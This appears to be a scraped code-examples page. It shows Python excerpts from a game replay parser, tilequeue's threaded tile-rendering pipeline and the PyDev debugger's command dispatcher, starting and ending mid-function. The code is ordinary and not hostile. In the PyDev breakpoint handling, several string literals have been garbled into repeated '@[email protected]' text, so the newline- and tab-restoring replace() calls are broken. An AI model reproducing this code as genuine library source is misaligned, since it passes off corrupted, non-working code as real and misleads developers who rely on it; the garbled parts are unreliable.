				if 'datablock_1' in result_blocks:
					if len(br_json_list) > 0:
						result_blocks['datablock_1']['vehicles'] = br_json_list[1]

					if len(br_json_list) > 1:
						result_blocks['datablock_1']['kills'] = br_json_list[2]

			else:

				try:
					from SafeUnpickler import SafeUnpickler
					br_block = SafeUnpickler.loads(myblock)
					br_block['parser'] = dict()
					br_block['parser']['battleResultVersion'] = 14
				except Exception, e:
					printmessage("Error with unpickling myblock: " + e.message)

			if int(br_block['parser']['battleResultVersion']) < 15:
				if 'personal' in br_block:
					br_block['personal']['details'] = decode_details(br_block['personal']['details'])
					if 'vehicles' in br_block:
						for key, value in br_block['vehicles'].items():
							if 'details' in br_block['vehicles'][key]:
								del br_block['vehicles'][key]['details']
						
					
			result_blocks['datablock_battle_result'] = br_block

			result_blocks['common']['datablock_battle_result'] = 1
			result_blocks['identify']['arenaUniqueID'] = result_blocks['datablock_battle_result']['arenaUniqueID']

				
		else:
			blockdict = dict()
			try:
				blockdict = json.loads(myblock)
			except Exception, e:
				printmessage("Error with JSON: " + e.message)
			
			
			if 'clientVersionFromExe' in blockdict:
				replay_version = cleanReplayVersion(blockdict['clientVersionFromExe'])
				result_blocks['common']['replay_version'] = replay_version
				result_blocks['identify']['replay_version'] = replay_version
				replay_version_dict = replay_version.split('.')
				printmessage("Replay Version: " + str(replay_version))
			
			result_blocks['datablock_' + str(i)] = blockdict
			result_blocks['common']['datablock_' + str(i)] = 1

		result_blocks['common']['message'] = "ok"
	
	result_blocks = get_identify(result_blocks)
		
	if option_advanced==1 or option_chat==1:

		decfile = decrypt_file(filename_source, startPointer)
		uncompressed = decompress_file(decfile)
		if option_advanced==1:
			
			with open(uncompressed, 'rb') as f:
				if is_supported_replay(f):
					result_blocks['datablock_advanced'] = extract_advanced(uncompressed)
					result_blocks['common']['datablock_advanced'] = 1
				else:
					result_blocks['common']['datablock_advanced'] = 0
					result_blocks['common']['message'] = "Unsupported binary replay"
					dumpjson(result_blocks, filename_source, 0)

		if option_chat==1:
			import legacy
			result_blocks['chat_timestamp'] = legacy.Data(open(uncompressed, 'rb')).data[legacy.KEY.CHAT]
			result_blocks['chat'] = "<br/>".join([msg.encode("string-escape") for msg, timestamp in result_blocks['chat_timestamp']])
			result_blocks['common']['datablock_chat'] = 1

			result_blocks['bindata'] = legacy.Data(open(uncompressed, 'rb')).data
			
			
		
	dumpjson(result_blocks, filename_source, 0)

Example 105

Project: tilequeue
Source File: command.py
View license
def tilequeue_process(cfg, peripherals):
    logger = make_logger(cfg, 'process')
    logger.warn('tilequeue processing started')

    assert os.path.exists(cfg.query_cfg), \
        'Invalid query config path'

    with open(cfg.query_cfg) as query_cfg_fp:
        query_cfg = yaml.load(query_cfg_fp)
    all_layer_data, layer_data, post_process_data = (
        parse_layer_data(
            query_cfg, cfg.buffer_cfg, cfg.template_path, cfg.reload_templates,
            os.path.dirname(cfg.query_cfg)))

    formats = lookup_formats(cfg.output_formats)

    sqs_queue = peripherals.queue

    store = make_store(cfg.store_type, cfg.s3_bucket, cfg)

    assert cfg.postgresql_conn_info, 'Missing postgresql connection info'

    n_cpu = multiprocessing.cpu_count()
    sqs_messages_per_batch = 10
    n_simultaneous_query_sets = cfg.n_simultaneous_query_sets
    if not n_simultaneous_query_sets:
        # default to number of databases configured
        n_simultaneous_query_sets = len(cfg.postgresql_conn_info['dbnames'])
    assert n_simultaneous_query_sets > 0
    default_queue_buffer_size = 128
    n_layers = len(all_layer_data)
    n_formats = len(formats)
    n_simultaneous_s3_storage = cfg.n_simultaneous_s3_storage
    if not n_simultaneous_s3_storage:
        n_simultaneous_s3_storage = max(n_cpu / 2, 1)
    assert n_simultaneous_s3_storage > 0

    # thread pool used for queries and uploading to s3
    n_total_needed_query = n_layers * n_simultaneous_query_sets
    n_total_needed_s3 = n_formats * n_simultaneous_s3_storage
    n_total_needed = n_total_needed_query + n_total_needed_s3
    n_max_io_workers = 50
    n_io_workers = min(n_total_needed, n_max_io_workers)
    io_pool = ThreadPool(n_io_workers)

    feature_fetcher = DataFetcher(cfg.postgresql_conn_info, all_layer_data,
                                  io_pool, n_layers)

    # create all queues used to manage pipeline

    sqs_input_queue_buffer_size = sqs_messages_per_batch
    # holds coord messages from sqs
    sqs_input_queue = Queue.Queue(sqs_input_queue_buffer_size)

    # holds raw sql results - no filtering or processing done on them
    sql_data_fetch_queue = multiprocessing.Queue(default_queue_buffer_size)

    # holds data after it has been filtered and processed
    # this is where the cpu intensive part of the operation will happen
    # the results will be data that is formatted for each necessary format
    processor_queue = multiprocessing.Queue(default_queue_buffer_size)

    # holds data after it has been sent to s3
    s3_store_queue = Queue.Queue(default_queue_buffer_size)

    # create worker threads/processes
    thread_sqs_queue_reader_stop = threading.Event()
    sqs_queue_reader = SqsQueueReader(sqs_queue, sqs_input_queue, logger,
                                      thread_sqs_queue_reader_stop)

    data_fetch = DataFetch(
        feature_fetcher, sqs_input_queue, sql_data_fetch_queue, io_pool,
        peripherals.redis_cache_index, logger)

    data_processor = ProcessAndFormatData(
        post_process_data, formats, sql_data_fetch_queue, processor_queue,
        cfg.layers_to_format, cfg.buffer_cfg, logger)

    s3_storage = S3Storage(processor_queue, s3_store_queue, io_pool,
                           store, logger)

    thread_sqs_writer_stop = threading.Event()
    sqs_queue_writer = SqsQueueWriter(sqs_queue, s3_store_queue, logger,
                                      thread_sqs_writer_stop)

    def create_and_start_thread(fn, *args):
        t = threading.Thread(target=fn, args=args)
        t.start()
        return t

    thread_sqs_queue_reader = create_and_start_thread(sqs_queue_reader)

    threads_data_fetch = []
    threads_data_fetch_stop = []
    for i in range(n_simultaneous_query_sets):
        thread_data_fetch_stop = threading.Event()
        thread_data_fetch = create_and_start_thread(data_fetch,
                                                    thread_data_fetch_stop)
        threads_data_fetch.append(thread_data_fetch)
        threads_data_fetch_stop.append(thread_data_fetch_stop)

    # create a data processor per cpu
    n_data_processors = n_cpu
    data_processors = []
    data_processors_stop = []
    for i in range(n_data_processors):
        data_processor_stop = multiprocessing.Event()
        process_data_processor = multiprocessing.Process(
            target=data_processor, args=(data_processor_stop,))
        process_data_processor.start()
        data_processors.append(process_data_processor)
        data_processors_stop.append(data_processor_stop)

    threads_s3_storage = []
    threads_s3_storage_stop = []
    for i in range(n_simultaneous_s3_storage):
        thread_s3_storage_stop = threading.Event()
        thread_s3_storage = create_and_start_thread(s3_storage,
                                                    thread_s3_storage_stop)
        threads_s3_storage.append(thread_s3_storage)
        threads_s3_storage_stop.append(thread_s3_storage_stop)

    thread_sqs_writer = create_and_start_thread(sqs_queue_writer)

    if cfg.log_queue_sizes:
        assert(cfg.log_queue_sizes_interval_seconds > 0)
        queue_data = (
            (sqs_input_queue, 'sqs'),
            (sql_data_fetch_queue, 'sql'),
            (processor_queue, 'proc'),
            (s3_store_queue, 's3'),
        )
        queue_printer_thread_stop = threading.Event()
        queue_printer = QueuePrint(
            cfg.log_queue_sizes_interval_seconds, queue_data, logger,
            queue_printer_thread_stop)
        queue_printer_thread = create_and_start_thread(queue_printer)
    else:
        queue_printer_thread = None
        queue_printer_thread_stop = None

    def stop_all_workers(signum, stack):
        logger.warn('tilequeue processing shutdown ...')

        logger.info('requesting all workers (threads and processes) stop ...')

        # each worker guards its read loop with an event object
        # ask all these to stop first

        thread_sqs_queue_reader_stop.set()
        for thread_data_fetch_stop in threads_data_fetch_stop:
            thread_data_fetch_stop.set()
        for data_processor_stop in data_processors_stop:
            data_processor_stop.set()
        for thread_s3_storage_stop in threads_s3_storage_stop:
            thread_s3_storage_stop.set()
        thread_sqs_writer_stop.set()

        if queue_printer_thread_stop:
            queue_printer_thread_stop.set()

        logger.info('requesting all workers (threads and processes) stop ... '
                    'done')

        # Once workers receive a stop event, they will keep reading
        # from their queues until they receive a sentinel value. This
        # is mandatory so that no messages will remain on queues when
        # asked to join. Otherwise, we never terminate.

        logger.info('joining all workers ...')

        logger.info('joining sqs queue reader ...')
        thread_sqs_queue_reader.join()
        logger.info('joining sqs queue reader ... done')
        logger.info('enqueueing sentinels for data fetchers ...')
        for i in range(len(threads_data_fetch)):
            sqs_input_queue.put(None)
        logger.info('enqueueing sentinels for data fetchers ... done')
        logger.info('joining data fetchers ...')
        for thread_data_fetch in threads_data_fetch:
            thread_data_fetch.join()
        logger.info('joining data fetchers ... done')
        logger.info('enqueueing sentinels for data processors ...')
        for i in range(len(data_processors)):
            sql_data_fetch_queue.put(None)
        logger.info('enqueueing sentinels for data processors ... done')
        logger.info('joining data processors ...')
        for data_processor in data_processors:
            data_processor.join()
        logger.info('joining data processors ... done')
        logger.info('enqueueing sentinels for s3 storage ...')
        for i in range(len(threads_s3_storage)):
            processor_queue.put(None)
        logger.info('enqueueing sentinels for s3 storage ... done')
        logger.info('joining s3 storage ...')
        for thread_s3_storage in threads_s3_storage:
            thread_s3_storage.join()
        logger.info('joining s3 storage ... done')
        logger.info('enqueueing sentinel for sqs queue writer ...')
        s3_store_queue.put(None)
        logger.info('enqueueing sentinel for sqs queue writer ... done')
        logger.info('joining sqs queue writer ...')
        thread_sqs_writer.join()
        logger.info('joining sqs queue writer ... done')
        if queue_printer_thread:
            logger.info('joining queue printer ...')
            queue_printer_thread.join()
            logger.info('joining queue printer ... done')

        logger.info('joining all workers ... done')

        logger.info('joining io pool ...')
        io_pool.close()
        io_pool.join()
        logger.info('joining io pool ... done')

        logger.info('joining multiprocess data fetch queue ...')
        sql_data_fetch_queue.close()
        sql_data_fetch_queue.join_thread()
        logger.info('joining multiprocess data fetch queue ... done')

        logger.info('joining multiprocess process queue ...')
        processor_queue.close()
        processor_queue.join_thread()
        logger.info('joining multiprocess process queue ... done')

        logger.warn('tilequeue processing shutdown ... done')
        sys.exit(0)

    signal.signal(signal.SIGTERM, stop_all_workers)
    signal.signal(signal.SIGINT, stop_all_workers)
    signal.signal(signal.SIGQUIT, stop_all_workers)

    logger.warn('all tilequeue threads and processes started')

    # this is necessary for the main thread to receive signals
    # when joining on threads/processes, the signal is never received
    # http://www.luke.maurits.id.au/blog/post/threads-and-signals-in-python.html
    while True:
        time.sleep(1024)

Example 106

View license
def process_net_command(py_db, cmd_id, seq, text):
    '''Processes a command received from the Java side

    @param cmd_id: the id of the command
    @param seq: the sequence of the command
    @param text: the text received in the command

    @note: this method is run as a big switch... after doing some tests, it's not clear whether changing it for
    a dict id --> function call will have better performance result. A simple test with xrange(10000000) showed
    that the gains from having a fast access to what should be executed are lost because of the function call in
    a way that if we had 10 elements in the switch the if..elif are better -- but growing the number of choices
    makes the solution with the dispatch look better -- so, if this gets more than 20-25 choices at some time,
    it may be worth refactoring it (actually, reordering the ifs so that the ones used mostly come before
    probably will give better performance).
    '''
    # print(ID_TO_MEANING[str(cmd_id)], repr(text))

    py_db._main_lock.acquire()
    try:
        try:
            cmd = None
            if cmd_id == CMD_RUN:
                py_db.ready_to_run = True

            elif cmd_id == CMD_VERSION:
                # response is version number
                # ide_os should be 'WINDOWS' or 'UNIX'.
                ide_os = 'WINDOWS'

                # Breakpoints can be grouped by 'LINE' or by 'ID'.
                breakpoints_by = 'LINE'

                splitted = text.split('\t')
                if len(splitted) == 1:
                    _local_version = splitted

                elif len(splitted) == 2:
                    _local_version, ide_os = splitted

                elif len(splitted) == 3:
                    _local_version, ide_os, breakpoints_by = splitted

                if breakpoints_by == 'ID':
                    py_db._set_breakpoints_with_id = True
                else:
                    py_db._set_breakpoints_with_id = False

                pydevd_file_utils.set_ide_os(ide_os)

                cmd = py_db.cmd_factory.make_version_message(seq)

            elif cmd_id == CMD_LIST_THREADS:
                # response is a list of threads
                cmd = py_db.cmd_factory.make_list_threads_message(seq)

            elif cmd_id == CMD_THREAD_KILL:
                int_cmd = InternalTerminateThread(text)
                py_db.post_internal_command(int_cmd, text)

            elif cmd_id == CMD_THREAD_SUSPEND:
                # Yes, thread suspend is still done at this point, not through an internal command!
                t = pydevd_find_thread_by_id(text)
                if t:
                    additional_info = None
                    try:
                        additional_info = t.additional_info
                    except AttributeError:
                        pass  # that's ok, no info currently set

                    if additional_info is not None:
                        for frame in additional_info.iter_frames(t):
                            py_db.set_trace_for_frame_and_parents(frame)
                            del frame

                    py_db.set_suspend(t, CMD_THREAD_SUSPEND)
                elif text.startswith('__frame__:'):
                    sys.stderr.write("Can't suspend tasklet: %s\n" % (text,))

            elif cmd_id == CMD_THREAD_RUN:
                t = pydevd_find_thread_by_id(text)
                if t:
                    thread_id = get_thread_id(t)
                    int_cmd = InternalRunThread(thread_id)
                    py_db.post_internal_command(int_cmd, thread_id)

                elif text.startswith('__frame__:'):
                    sys.stderr.write("Can't make tasklet run: %s\n" % (text,))


            elif cmd_id == CMD_STEP_INTO or cmd_id == CMD_STEP_OVER or cmd_id == CMD_STEP_RETURN or \
                    cmd_id == CMD_STEP_INTO_MY_CODE:
                # we received some command to make a single step
                t = pydevd_find_thread_by_id(text)
                if t:
                    thread_id = get_thread_id(t)
                    int_cmd = InternalStepThread(thread_id, cmd_id)
                    py_db.post_internal_command(int_cmd, thread_id)

                elif text.startswith('__frame__:'):
                    sys.stderr.write("Can't make tasklet step command: %s\n" % (text,))


            elif cmd_id == CMD_RUN_TO_LINE or cmd_id == CMD_SET_NEXT_STATEMENT or cmd_id == CMD_SMART_STEP_INTO:
                # we received some command to make a single step
                thread_id, line, func_name = text.split('\t', 2)
                t = pydevd_find_thread_by_id(thread_id)
                if t:
                    int_cmd = InternalSetNextStatementThread(thread_id, cmd_id, line, func_name)
                    py_db.post_internal_command(int_cmd, thread_id)
                elif thread_id.startswith('__frame__:'):
                    sys.stderr.write("Can't set next statement in tasklet: %s\n" % (thread_id,))


            elif cmd_id == CMD_RELOAD_CODE:
                # we received some command to make a reload of a module
                module_name = text.strip()

                thread_id = '*'  # Any thread

                # Note: not going for the main thread because in this case it'd only do the load
                # when we stopped on a breakpoint.
                # for tid, t in py_db._running_thread_ids.items(): #Iterate in copy
                #    thread_name = t.getName()
                #
                #    print thread_name, get_thread_id(t)
                #    #Note: if possible, try to reload on the main thread
                #    if thread_name == 'MainThread':
                #        thread_id = tid

                int_cmd = ReloadCodeCommand(module_name, thread_id)
                py_db.post_internal_command(int_cmd, thread_id)


            elif cmd_id == CMD_CHANGE_VARIABLE:
                # the text is: thread\tstackframe\tFRAME|GLOBAL\tattribute_to_change\tvalue_to_change
                try:
                    thread_id, frame_id, scope, attr_and_value = text.split('\t', 3)

                    tab_index = attr_and_value.rindex('\t')
                    attr = attr_and_value[0:tab_index].replace('\t', '.')
                    value = attr_and_value[tab_index + 1:]
                    int_cmd = InternalChangeVariable(seq, thread_id, frame_id, scope, attr, value)
                    py_db.post_internal_command(int_cmd, thread_id)

                except:
                    traceback.print_exc()

            elif cmd_id == CMD_GET_VARIABLE:
                # we received some command to get a variable
                # the text is: thread_id\tframe_id\tFRAME|GLOBAL\tattributes*
                try:
                    thread_id, frame_id, scopeattrs = text.split('\t', 2)

                    if scopeattrs.find('\t') != -1:  # there are attributes beyond scope
                        scope, attrs = scopeattrs.split('\t', 1)
                    else:
                        scope, attrs = (scopeattrs, None)

                    int_cmd = InternalGetVariable(seq, thread_id, frame_id, scope, attrs)
                    py_db.post_internal_command(int_cmd, thread_id)

                except:
                    traceback.print_exc()

            elif cmd_id == CMD_GET_ARRAY:
                # we received some command to get an array variable
                # the text is: thread_id\tframe_id\tFRAME|GLOBAL\tname\ttemp\troffs\tcoffs\trows\tcols\tformat
                try:
                    roffset, coffset, rows, cols, format, thread_id, frame_id, scopeattrs  = text.split('\t', 7)

                    if scopeattrs.find('\t') != -1:  # there are attributes beyond scope
                        scope, attrs = scopeattrs.split('\t', 1)
                    else:
                        scope, attrs = (scopeattrs, None)

                    int_cmd = InternalGetArray(seq, roffset, coffset, rows, cols, format, thread_id, frame_id, scope, attrs)
                    py_db.post_internal_command(int_cmd, thread_id)

                except:
                    traceback.print_exc()

            elif cmd_id == CMD_GET_COMPLETIONS:
                # we received some command to get a variable
                # the text is: thread_id\tframe_id\tactivation token
                try:
                    thread_id, frame_id, scope, act_tok = text.split('\t', 3)

                    int_cmd = InternalGetCompletions(seq, thread_id, frame_id, act_tok)
                    py_db.post_internal_command(int_cmd, thread_id)

                except:
                    traceback.print_exc()

            elif cmd_id == CMD_GET_FRAME:
                thread_id, frame_id, scope = text.split('\t', 2)

                int_cmd = InternalGetFrame(seq, thread_id, frame_id)
                py_db.post_internal_command(int_cmd, thread_id)

            elif cmd_id == CMD_SET_BREAK:
                # func name: 'None': match anything. Empty: match global, specified: only method context.
                # command to add some breakpoint.
                # text is file\tline. Add to breakpoints dictionary
                if py_db._set_breakpoints_with_id:
                    breakpoint_id, type, file, line, func_name, condition, expression = text.split('\t', 6)

                    breakpoint_id = int(breakpoint_id)
                    line = int(line)

                    # We must restore new lines and tabs as done in
                    # AbstractDebugTarget.breakpointAdded
                    condition = condition.replace("@[email protected][email protected][email protected]", '\n').\
                        replace("@[email protected][email protected][email protected]", '\t').strip()

                    expression = expression.replace("@[email protected][email protected][email protected]", '\n').\
                        replace("@[email protected][email protected][email protected]", '\t').strip()
                else:
                    #Note: this else should be removed after PyCharm migrates to setting
                    #breakpoints by id (and ideally also provides func_name).
                    type, file, line, func_name, condition, expression = text.split('\t', 5)
                    # If we don't have an id given for each breakpoint, consider
                    # the id to be the line.
                    breakpoint_id = line = int(line)

                    condition = condition.replace("@[email protected][email protected][email protected]", '\n'). \
                        replace("@[email protected][email protected][email protected]", '\t').strip()

                    expression = expression.replace("@[email protected][email protected][email protected]", '\n'). \
                        replace("@[email protected][email protected][email protected]", '\t').strip()

                if not IS_PY3K:  # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
                    file = file.encode(file_system_encoding)

                file = pydevd_file_utils.norm_file_to_server(file)

                if not pydevd_file_utils.exists(file):
                    sys.stderr.write('pydev debugger: warning: trying to add breakpoint'\
                        ' to file that does not exist: %s (will have no effect)\n' % (file,))
                    sys.stderr.flush()


                if len(condition) <= 0 or condition is None or condition == "None":
                    condition = None

                if len(expression) <= 0 or expression is None or expression == "None":
                    expression = None

                supported_type = False
                if type == 'python-line':
                    breakpoint = LineBreakpoint(line, condition, func_name, expression)
                    breakpoints = py_db.breakpoints
                    file_to_id_to_breakpoint = py_db.file_to_id_to_line_breakpoint
                    supported_type = True
                else:
                    result = None
                    plugin = py_db.get_plugin_lazy_init()
                    if plugin is not None:
                        result = plugin.add_breakpoint('add_line_breakpoint', py_db, type, file, line, condition, expression, func_name)
                    if result is not None:
                        supported_type = True
                        breakpoint, breakpoints = result
                        file_to_id_to_breakpoint = py_db.file_to_id_to_plugin_breakpoint
                    else:
                        supported_type = False

                if not supported_type:
                    raise NameError(type)

                if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
                    pydev_log.debug('Added breakpoint:%s - line:%s - func_name:%s\n' % (file, line, func_name.encode('utf-8')))
                    sys.stderr.flush()

                if dict_contains(file_to_id_to_breakpoint, file):
                    id_to_pybreakpoint = file_to_id_to_breakpoint[file]
                else:
                    id_to_pybreakpoint = file_to_id_to_breakpoint[file] = {}

                id_to_pybreakpoint[breakpoint_id] = breakpoint
                py_db.consolidate_breakpoints(file, id_to_pybreakpoint, breakpoints)
                if py_db.plugin is not None:
                    py_db.has_plugin_line_breaks = py_db.plugin.has_line_breaks()

                py_db.set_tracing_for_untraced_contexts(overwrite_prev_trace=True)

            elif cmd_id == CMD_REMOVE_BREAK:
                #command to remove some breakpoint
                #text is type\file\tid. Remove from breakpoints dictionary
                breakpoint_type, file, breakpoint_id = text.split('\t', 2)

                if not IS_PY3K:  # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
                    file = file.encode(file_system_encoding)

                file = pydevd_file_utils.norm_file_to_server(file)

                try:
                    breakpoint_id = int(breakpoint_id)
                except ValueError:
                    pydev_log.error('Error removing breakpoint. Expected breakpoint_id to be an int. Found: %s' % (breakpoint_id,))

                else:
                    file_to_id_to_breakpoint = None
                    if breakpoint_type == 'python-line':
                        breakpoints = py_db.breakpoints
                        file_to_id_to_breakpoint = py_db.file_to_id_to_line_breakpoint
                    elif py_db.get_plugin_lazy_init() is not None:
                        result = py_db.plugin.get_breakpoints(py_db, breakpoint_type)
                        if result is not None:
                            file_to_id_to_breakpoint = py_db.file_to_id_to_plugin_breakpoint
                            breakpoints = result

                    if file_to_id_to_breakpoint is None:
                        pydev_log.error('Error removing breakpoint. Cant handle breakpoint of type %s' % breakpoint_type)
                    else:
                        try:
                            id_to_pybreakpoint = file_to_id_to_breakpoint.get(file, {})
                            if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
                                existing = id_to_pybreakpoint[breakpoint_id]
                                sys.stderr.write('Removed breakpoint:%s - line:%s - func_name:%s (id: %s)\n' % (
                                    file, existing.line, existing.func_name.encode('utf-8'), breakpoint_id))

                            del id_to_pybreakpoint[breakpoint_id]
                            py_db.consolidate_breakpoints(file, id_to_pybreakpoint, breakpoints)
                            if py_db.plugin is not None:
                                py_db.has_plugin_line_breaks = py_db.plugin.has_line_breaks()

                        except KeyError:
                            pydev_log.error("Error removing breakpoint: Breakpoint id not found: %s id: %s. Available ids: %s\n" % (
                                file, breakpoint_id, dict_keys(id_to_pybreakpoint)))


            elif cmd_id == CMD_EVALUATE_EXPRESSION or cmd_id == CMD_EXEC_EXPRESSION:
                #command to evaluate the given expression
                #text is: thread\tstackframe\tLOCAL\texpression
                thread_id, frame_id, scope, expression, trim = text.split('\t', 4)
                int_cmd = InternalEvaluateExpression(seq, thread_id, frame_id, expression,
                    cmd_id == CMD_EXEC_EXPRESSION, int(trim) == 1)
                py_db.post_internal_command(int_cmd, thread_id)

            elif cmd_id == CMD_CONSOLE_EXEC:
                #command to exec expression in console, in case expression is only partially valid 'False' is returned
                #text is: thread\tstackframe\tLOCAL\texpression

                thread_id, frame_id, scope, expression = text.split('\t', 3)

                int_cmd = InternalConsoleExec(seq, thread_id, frame_id, expression)
                py_db.post_internal_command(int_cmd, thread_id)

            elif cmd_id == CMD_SET_PY_EXCEPTION:
                # Command which receives set of exceptions on which user wants to break the debugger
                # text is: break_on_uncaught;break_on_caught;TypeError;ImportError;zipimport.ZipImportError;
                # This API is optional and works 'in bulk' -- it's possible
                # to get finer-grained control with CMD_ADD_EXCEPTION_BREAK/CMD_REMOVE_EXCEPTION_BREAK
                # which allows setting caught/uncaught per exception.
                #
                splitted = text.split(';')
                py_db.break_on_uncaught_exceptions = {}
                py_db.break_on_caught_exceptions = {}
                added = []
                if len(splitted) >= 4:
                    if splitted[0] == 'true':
                        break_on_uncaught = True
                    else:
                        break_on_uncaught = False

                    if splitted[1] == 'true':
                        break_on_caught = True
                    else:
                        break_on_caught = False

                    if splitted[2] == 'true':
                        py_db.break_on_exceptions_thrown_in_same_context = True
                    else:
                        py_db.break_on_exceptions_thrown_in_same_context = False

                    if splitted[3] == 'true':
                        py_db.ignore_exceptions_thrown_in_lines_with_ignore_exception = True
                    else:
                        py_db.ignore_exceptions_thrown_in_lines_with_ignore_exception = False

                    for exception_type in splitted[4:]:
                        exception_type = exception_type.strip()
                        if not exception_type:
                            continue

                        exception_breakpoint = py_db.add_break_on_exception(
                            exception_type,
                            notify_always=break_on_caught,
                            notify_on_terminate=break_on_uncaught,
                            notify_on_first_raise_only=False,
                        )
                        if exception_breakpoint is None:
                            continue
                        added.append(exception_breakpoint)

                    py_db.update_after_exceptions_added(added)

                else:
                    sys.stderr.write("Error when setting exception list. Received: %s\n" % (text,))

            elif cmd_id == CMD_GET_FILE_CONTENTS:

                if not IS_PY3K:  # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
                    text = text.encode(file_system_encoding)

                if os.path.exists(text):
                    f = open(text, 'r')
                    try:
                        source = f.read()
                    finally:
                        f.close()
                    cmd = py_db.cmd_factory.make_get_file_contents(seq, source)

            elif cmd_id == CMD_SET_PROPERTY_TRACE:
                # Command which receives whether to trace property getter/setter/deleter
                # text is feature_state(true/false);disable_getter/disable_setter/disable_deleter
                if text != "":
                    splitted = text.split(';')
                    if len(splitted) >= 3:
                        if py_db.disable_property_trace is False and splitted[0] == 'true':
                            # Replacing property by custom property only when the debugger starts
                            pydevd_traceproperty.replace_builtin_property()
                            py_db.disable_property_trace = True
                        # Enable/Disable tracing of the property getter
                        if splitted[1] == 'true':
                            py_db.disable_property_getter_trace = True
                        else:
                            py_db.disable_property_getter_trace = False
                        # Enable/Disable tracing of the property setter
                        if splitted[2] == 'true':
                            py_db.disable_property_setter_trace = True
                        else:
                            py_db.disable_property_setter_trace = False
                        # Enable/Disable tracing of the property deleter
                        if splitted[3] == 'true':
                            py_db.disable_property_deleter_trace = True
                        else:
                            py_db.disable_property_deleter_trace = False
                else:
                    # User hasn't configured any settings for property tracing
                    pass

            elif cmd_id == CMD_ADD_EXCEPTION_BREAK:
                if text.find('\t') != -1:
                    exception, notify_always, notify_on_terminate, ignore_libraries = text.split('\t', 3)
                else:
                    exception, notify_always, notify_on_terminate, ignore_libraries = text, 0, 0, 0

                if exception.find('-') != -1:
                    breakpoint_type, exception = exception.split('-')
                else:
                    breakpoint_type = 'python'

                if breakpoint_type == 'python':
                    if int(notify_always) == 1:
                        pydev_log.warn("Deprecated parameter: 'notify always' policy removed in PyCharm\n")
                    exception_breakpoint = py_db.add_break_on_exception(
                        exception,
                        notify_always=int(notify_always) > 0,
                        notify_on_terminate = int(notify_on_terminate) == 1,
                        notify_on_first_raise_only=int(notify_always) == 2,
                        ignore_libraries=int(ignore_libraries) > 0
                    )

                    if exception_breakpoint is not None:
                        py_db.update_after_exceptions_added([exception_breakpoint])
                else:
                    supported_type = False
                    plugin = py_db.get_plugin_lazy_init()
                    if plugin is not None:
                        supported_type = plugin.add_breakpoint('add_exception_breakpoint', py_db, breakpoint_type, exception)

                    if supported_type:
                        py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
                    else:
                        raise NameError(breakpoint_type)



            elif cmd_id == CMD_REMOVE_EXCEPTION_BREAK:
                exception = text
                if exception.find('-') != -1:
                    exception_type, exception = exception.split('-')
                else:
                    exception_type = 'python'

                if exception_type == 'python':
                    try:
                        cp = py_db.break_on_uncaught_exceptions.copy()
                        dict_pop(cp, exception, None)
                        py_db.break_on_uncaught_exceptions = cp

                        cp = py_db.break_on_caught_exceptions.copy()
                        dict_pop(cp, exception, None)
                        py_db.break_on_caught_exceptions = cp
                    except:
                        pydev_log.debug("Error while removing exception %s"%sys.exc_info()[0])
                    update_exception_hook(py_db)
                else:
                    supported_type = False

                    # I.e.: no need to initialize lazy (if we didn't have it in the first place, we can't remove
                    # anything from it anyways).
                    plugin = py_db.plugin
                    if plugin is not None:
                        supported_type = plugin.remove_exception_breakpoint(py_db, exception_type, exception)

                    if supported_type:
                        py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
                    else:
                        raise NameError(exception_type)

            elif cmd_id == CMD_LOAD_SOURCE:
                path = text
                try:
                    f = open(path, 'r')
                    source = f.read()
                    py_db.cmd_factory.make_load_source_message(seq, source, py_db)
                except:
                    return py_db.cmd_factory.make_error_message(seq, pydevd_tracing.get_exception_traceback_str())

            elif cmd_id == CMD_ADD_DJANGO_EXCEPTION_BREAK:
                exception = text
                plugin = py_db.get_plugin_lazy_init()
                if plugin is not None:
                    plugin.add_breakpoint('add_exception_breakpoint', py_db, 'django', exception)
                    py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()


            elif cmd_id == CMD_REMOVE_DJANGO_EXCEPTION_BREAK:
                exception = text

                # I.e.: no need to initialize lazy (if we didn't have it in the first place, we can't remove
                # anything from it anyways).
                plugin = py_db.plugin
                if plugin is not None:
                    plugin.remove_exception_breakpoint(py_db, 'django', exception)
                    py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()

            elif cmd_id == CMD_EVALUATE_CONSOLE_EXPRESSION:
                # Command which takes care for the debug console communication
                if text != "":
                    thread_id, frame_id, console_command = text.split('\t', 2)
                    console_command, line = console_command.split('\t')

                    if console_command == 'EVALUATE':
                        int_cmd = InternalEvaluateConsoleExpression(
                            seq, thread_id, frame_id, line, buffer_output=True)

                    elif console_command == 'EVALUATE_UNBUFFERED':
                        int_cmd = InternalEvaluateConsoleExpression(
                            seq, thread_id, frame_id, line, buffer_output=False)

                    elif console_command == 'GET_COMPLETIONS':
                        int_cmd = InternalConsoleGetCompletions(seq, thread_id, frame_id, line)

                    else:
                        raise ValueError('Unrecognized command: %s' % (console_command,))

                    py_db.post_internal_command(int_cmd, thread_id)

            elif cmd_id == CMD_RUN_CUSTOM_OPERATION:
                # Command which runs a custom operation
                if text != "":
                    try:
                        location, custom = text.split('||', 1)
                    except:
                        sys.stderr.write('Custom operation now needs a || separator. Found: %s\n' % (text,))
                        raise

                    thread_id, frame_id, scopeattrs = location.split('\t', 2)

                    if scopeattrs.find('\t') != -1:  # there are attributes beyond scope
                        scope, attrs = scopeattrs.split('\t', 1)
                    else:
                        scope, attrs = (scopeattrs, None)

                    # : style: EXECFILE or EXEC
                    # : encoded_code_or_file: file to execute or code
                    # : fname: name of function to be executed in the resulting namespace
                    style, encoded_code_or_file, fnname = custom.split('\t', 3)
                    int_cmd = InternalRunCustomOperation(seq, thread_id, frame_id, scope, attrs,
                                                         style, encoded_code_or_file, fnname)
                    py_db.post_internal_command(int_cmd, thread_id)

            elif cmd_id == CMD_IGNORE_THROWN_EXCEPTION_AT:
                if text:
                    replace = 'REPLACE:'  # Not all 3.x versions support u'REPLACE:', so, doing workaround.
                    if not IS_PY3K:
                        replace = unicode(replace)

                    if text.startswith(replace):
                        text = text[8:]
                        py_db.filename_to_lines_where_exceptions_are_ignored.clear()

                    if text:
